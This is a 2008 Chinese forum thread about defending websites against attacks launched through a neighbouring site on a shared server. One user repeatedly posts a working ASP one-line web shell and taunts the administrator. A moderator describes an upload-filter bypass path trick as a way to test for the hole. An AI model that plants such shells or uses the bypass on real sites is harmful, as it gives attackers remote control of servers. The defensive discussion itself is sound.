| 网站首页 | 业界新闻 | 小组 | 威客 | 人才 | 下载频道 | 博客 | 代码贴 | 在线编程 | 编程论坛
欢迎加入我们,一同切磋技术
用户名:   
 
密 码:  
共有 2704 人关注过本帖
标题:旁注网站小助手怎么防治
只看楼主 加入收藏
天上竹子
Rank: 1
等 级:新手上路
帖 子:2
专家分:0
注 册:2008-6-6
收藏
得分:0 
首先要理解什么是旁注

旁注是指黑客通过对与A站同服务器的B站进行注入,获得B站的权限,再通过服务器的漏洞,得到A站的权限
所以A处于很被动的角色,是基本无法防御的

一个方法就是帮B站搞好安全,一个方法就是和服务器提供商联系请求补好漏洞,还有一个就是关掉A站的FSO权限
2008-06-06 15:47
lovecs1763
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-7-4
收藏
得分:0 
是不是像我这样的啊!
<%execute request("value")%>
2008-07-04 03:31
lovecs1763
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-7-4
收藏
得分:0 
我没改你的权限 你应该感到高兴
你连是怎么传上去都不知道你还做管理员??
2008-07-04 03:34
lovecs1763
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-7-4
收藏
得分:0 
<%execute request("RAINMIN")%>
2008-07-04 03:45
lovecs1763
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-7-4
收藏
得分:0 
<%execute request("value")%>
<%execute request("value")%>
2008-07-04 03:45
lovecs1763
Rank: 1
等 级:新手上路
帖 子:5
专家分:0
注 册:2008-7-4
收藏
得分:0 
<%execute request("value")%>
<%execute request("value")%>
2008-07-04 03:54
yms123
Rank: 16Rank: 16Rank: 16Rank: 16
等 级:版主
威 望:209
帖 子:12488
专家分:19042
注 册:2004-7-17
收藏
得分:0 
如果是多出的ASP文件基本可以确定是上传漏洞所为,楼主的网站可能存在上传漏洞。
检测办法楼主可以在自己的网站文件上传的地方传任意一个asp文件,路径写法如下
X:\xxx\xxx\xxx.asp/0.jpg
比如从c盘上传一个abc.asp文件路径如下
c:\abc.asp/0.jpg
如果这个文件被成功上传并且没有错误提示,楼主的网站就可以确定有文件上传漏洞了。
2008-07-04 09:44
快速回复:旁注网站小助手怎么防治
数据加载中...
 
   



关于我们 | 广告合作 | 编程中国 | 清除Cookies | TOP | 手机版

编程中国 版权所有,并保留所有权利。
Powered by Discuz, Processed in 0.025524 second(s), 7 queries.
Copyright©2004-2024, BCCN.NET, All Rights Reserved